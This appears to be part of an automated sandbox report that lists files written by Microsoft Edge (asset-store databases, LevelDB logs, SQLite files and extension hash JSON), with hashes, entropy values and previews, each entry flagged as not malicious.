                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):1696115
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.04061501815607
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:kjf76gGkISshcFdmcOAoPENUpifYP+MbI2T:kjfgAmmE
                                                                                                                                                                                                                                                                                                MD5:BEEEAA2C6498E174BEE185E7FF523701
                                                                                                                                                                                                                                                                                                SHA1:540F8290DCA1645162F2AE14195BD76EF8D7573C
                                                                                                                                                                                                                                                                                                SHA-256:B4F67F893EF1CD05F69992F415EF02B192B2071BD57D84CDEF5D5FDEA0F73E75
                                                                                                                                                                                                                                                                                                SHA-512:8027B908E47E980A1946CE2C65E9758FF7B4431D6CBAE7FBBAB3E5742856DDE898E2C3E59F0C5EFC152BD5E33D863D36437DEF386279B7CC439D414C729057DA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.091927236147782
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4pMN+q2PcNwi23oH+Tcwt9Eh1tIFUtL4pFFoZmwl4plVkwOcNwi23oH+TcwtY:7p4iIvLZYeb9Eh16FUtL4xo/l4d54ZYf
                                                                                                                                                                                                                                                                                                MD5:71078625F551F53D1061EB259BCC5E70
                                                                                                                                                                                                                                                                                                SHA1:CF10BB9B9D54786CB3A4439801D2ED7C44548527
                                                                                                                                                                                                                                                                                                SHA-256:BAE798B41D3BE7FD60EB120C642F84B0780D6F93A1D0CE0403110727A5A16FAE
                                                                                                                                                                                                                                                                                                SHA-512:BEA29638F2D221345B7F587334523F5DC54718BF10F1D611B2F5B9C6998E0AC1AA243E3CCD290F95C2CD9AF0030D45E709F1E0998A28A6354515A56B37021260
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:10.119 1ca8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/07-07:19:10.120 1ca8 Recovering log #3.2025/01/07-07:19:10.127 1ca8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.4630429599263615
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuWl8kt:TouQq3qh7z3bY2LNW9WMcUvBuU
                                                                                                                                                                                                                                                                                                MD5:1BCDA6BF2CA4A8F3B3CA9B21FFA1904F
                                                                                                                                                                                                                                                                                                SHA1:7C72BC21119FA49040D9455A77CB087D2C70A162
                                                                                                                                                                                                                                                                                                SHA-256:F1C4CE1F69C72362E55FE5DD764D0874BBFD3F8ED429196DB598004CAC4F38F2
                                                                                                                                                                                                                                                                                                SHA-512:4412637A6167C9C25EF497FBE3EB1CB10E7A22E8AC36589E28293E70B18B315EC6DDF00FF489119006B4E607ED79AE5CD29BDF2179670721BF2CE76EC37E11B2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):351
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190819062410637
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43ayq2PcNwi23oH+TcwtnG2tMsIFUtL43/7Lj1Zmwl43/7L1RkwOcNwi23oHC:7p43ayvLZYebn9GFUtL43/79/l43/7pI
                                                                                                                                                                                                                                                                                                MD5:27A55425EC618572597238986233B7A4
                                                                                                                                                                                                                                                                                                SHA1:208AEF2EA76F5B1422C314BAC67745A6FF959FE6
                                                                                                                                                                                                                                                                                                SHA-256:56A6F4DBC152CD68A925625AACA6549242E5C2115C1D2AF7428834F616DC3F1C
                                                                                                                                                                                                                                                                                                SHA-512:2120D3CAF7F1861232FCD1380E7F0B1B7F19062A29A4D0B3A5AF7873DC5C90C888401AC0A439BF7A2274670AE9F8DB4FC884AFBB78023B13D8DC362029445EEE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.951 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/07-07:19:02.952 a74 Recovering log #3.2025/01/07-07:19:02.952 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6127109995648983
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jRUZpcGmL:TO8D4jJ/6Up+lN
                                                                                                                                                                                                                                                                                                MD5:35CD92B43D1EA78D783925776D6C7188
                                                                                                                                                                                                                                                                                                SHA1:4DA8FC562C5919BD7F2471B05891B54F9AE9C2C3
                                                                                                                                                                                                                                                                                                SHA-256:89D115CDF8A402D45D6B7295D03784A418F8FCC9BF6589D9784E1DB02B9D14D7
                                                                                                                                                                                                                                                                                                SHA-512:D445850247F50F19B7751F0E4EFF0EFD537F679DD131AFCA1016D14738B7CDD55E6CB071CFFA9F2EC1815952E1FA2143E9F0730B4029019BFB740C8587DC182D
                                                                                                                                                                                                                                                                                                Malicious:false
Preview:SQLite format 3......@ ...
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.354162421918691
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:WA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:WFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                MD5:3E05DCCCDBB84B39F019D56BC8ED7A35
                                                                                                                                                                                                                                                                                                SHA1:67234501C95C9529CCDE5C3E8F95263E9E64E648
                                                                                                                                                                                                                                                                                                SHA-256:36C602711A4866E96EAC7147A1B190F3E20405F5E18462C06131DBC5148ABBBC
                                                                                                                                                                                                                                                                                                SHA-512:4956C94D5450FCF0C0DFE9015C019A68712AD676738EE15DC962C8A257072D8C4782957DAF03855E89F110847E0A78249094E0120AF15DC84101D9050B576AE0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380725951574945..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.161589943853795
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4vvAAEq1cNwi23oH+Tcwtk2WwnvB2KLl74tTM9+q2PcNwi23oH+Tcwtk2Wwnp:7p4v2cZYebkxwnvFLl4ZvLZYebkxwnQg
                                                                                                                                                                                                                                                                                                MD5:2F5D855AD3D8AD3D5E66D18909A5CBE0
                                                                                                                                                                                                                                                                                                SHA1:A9BC7374191DC74517C2E644C8E4A1AD6DC3113E
                                                                                                                                                                                                                                                                                                SHA-256:E0591B93DF809CE6EE86ADEA4ACCECA90DF03005DCFF74A1C44ECBC049EDC445
                                                                                                                                                                                                                                                                                                SHA-512:3C24238A293FC1800038F05F4090AAF8DD17947D518CB737DA1F2BD1D2CC2E8D736260942FE44710905907165DCB59B7C762ADAB0E76568A48F3856D81310319
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:10.217 1d88 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/07-07:19:10.531 1d88 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):358859
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.32460773903042
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6R3:C1gAg1zfvP
                                                                                                                                                                                                                                                                                                MD5:37DEB1E3DC778E444F1CE65E27236E65
                                                                                                                                                                                                                                                                                                SHA1:C05BFC700D95ABF06D6FABF3E9B03AD30B0AF283
                                                                                                                                                                                                                                                                                                SHA-256:3A83012F3F2B260AF39709A1880018E42209819925689195FB16FF9D60E3D621
                                                                                                                                                                                                                                                                                                SHA-512:C52EF2FC8105F9C3E7243BEA3359B281B6EB08AD1DEABED58A3350EA195C6989D0EAB27ED9E7B06FE59A078AD635956C181F5F73413069104FF5CF7E230FB54E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.168832279455654
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43Zvlyq2PcNwi23oH+Tcwt8aPrqIFUtL43Mj1Zmwl43M1RkwOcNwi23oH+TcD:7p43ryvLZYebL3FUtL43MJ/l43M1R546
                                                                                                                                                                                                                                                                                                MD5:40D533A76230622C5FBA804CA38017B3
                                                                                                                                                                                                                                                                                                SHA1:12C3467921B194977ADD3D8192931B29107EA3CA
                                                                                                                                                                                                                                                                                                SHA-256:DCA7F9B48BCF0CE2A4B1FC5965540BB975759639D84170A063C870364F1A3878
                                                                                                                                                                                                                                                                                                SHA-512:5AFF36A72C999E204EECDDDCFC8BE4D4141F385FE67B9171434A68668BB6D6F8B96B72EEEF5F121A25DF64964EA2DA4A39F7567445BEEDE81D23F082B668F439
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.954 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/07-07:19:02.955 a74 Recovering log #3.2025/01/07-07:19:02.955 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190031854648643
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43uVF31yq2PcNwi23oH+Tcwt865IFUtL41R11Zmwl4t1RkwOcNwi23oH+Tcwx:7p43uVFlyvLZYeb/WFUtL4bX/l4t1R5G
                                                                                                                                                                                                                                                                                                MD5:A00E5DD6E94AAF03B6D41966E4D71A5C
                                                                                                                                                                                                                                                                                                SHA1:788A96E1F05EF61D738AFF081622D625BE0A629C
                                                                                                                                                                                                                                                                                                SHA-256:AAF0C2228C15A78BBDEDDABD7B50414232913E12600E1B21C5B7B60DF8E56CC5
                                                                                                                                                                                                                                                                                                SHA-512:85E1980E0433E57CBF1FD7A6D791406DD9802DEDAE154C7E4F31CE2FB9E93C8733255FFD9FDA98429675A74218270054A0EC515AF991228111E71AD36AEA5C5E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.960 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/07-07:19:03.083 a74 Recovering log #3.2025/01/07-07:19:03.087 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):331
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.190031854648643
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp43uVF31yq2PcNwi23oH+Tcwt865IFUtL41R11Zmwl4t1RkwOcNwi23oH+Tcwx:7p43uVFlyvLZYeb/WFUtL4bX/l4t1R5G
                                                                                                                                                                                                                                                                                                MD5:A00E5DD6E94AAF03B6D41966E4D71A5C
                                                                                                                                                                                                                                                                                                SHA1:788A96E1F05EF61D738AFF081622D625BE0A629C
                                                                                                                                                                                                                                                                                                SHA-256:AAF0C2228C15A78BBDEDDABD7B50414232913E12600E1B21C5B7B60DF8E56CC5
                                                                                                                                                                                                                                                                                                SHA-512:85E1980E0433E57CBF1FD7A6D791406DD9802DEDAE154C7E4F31CE2FB9E93C8733255FFD9FDA98429675A74218270054A0EC515AF991228111E71AD36AEA5C5E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:02.960 a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/07-07:19:03.083 a74 Recovering log #3.2025/01/07-07:19:03.087 a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.136084345419576
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp48+q2PcNwi23oH+Tcwt8NIFUtL4hWZmwl4Oa9VkwOcNwi23oH+Tcwt8+eLJ:7p48+vLZYebpFUtL4hW/l4ZV54ZYebqJ
                                                                                                                                                                                                                                                                                                MD5:DC9728EBA5F02EC1FC8674F9F7E7C918
                                                                                                                                                                                                                                                                                                SHA1:5BF55690C04EEA20D554960E7B6756F9EEBAE4A3
                                                                                                                                                                                                                                                                                                SHA-256:CBC4E44C982F5F9F8716059F904AF86E6C09E60BED0110032CCB2B21A45330F5
                                                                                                                                                                                                                                                                                                SHA-512:FCB027AEEE53B0ECBF0E3F5DB6D6E22BCBB33DC566F1F2997EA0C701B83E6BD29570879AC88E6887EC28B3D77B83054444C10DAC03A10FD327BDC8D834EA1DF7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.704 a3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/07-07:19:03.704 a3c Recovering log #3.2025/01/07-07:19:03.705 a3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.21822857380901528
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:uq/DllntFlljq7A/mhWJFuQ3yy7IOWUQe/nol/dweytllrE9SFcTp4AGbNCV9RU5:uok75fOXvol/d0Xi99pEYu1n
                                                                                                                                                                                                                                                                                                MD5:565722909CA4CA154FB6340FD34E4491
                                                                                                                                                                                                                                                                                                SHA1:06854745475B5F7D87022797439BB292E9DA6092
                                                                                                                                                                                                                                                                                                SHA-256:4330B532F4828C44DA2B38A1111E32DC01B8E33AD1C3079D588788CC716A18EE
                                                                                                                                                                                                                                                                                                SHA-512:2B1BB7729A9460A44FE6566E7F1BE91EF869EE6AC12AEF2FA9E52EB8DA2B9FA3B791D0F2BFE68B4878D6F622F9C310C7F384CE5AD72C8C7A0DB27D24496C535A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
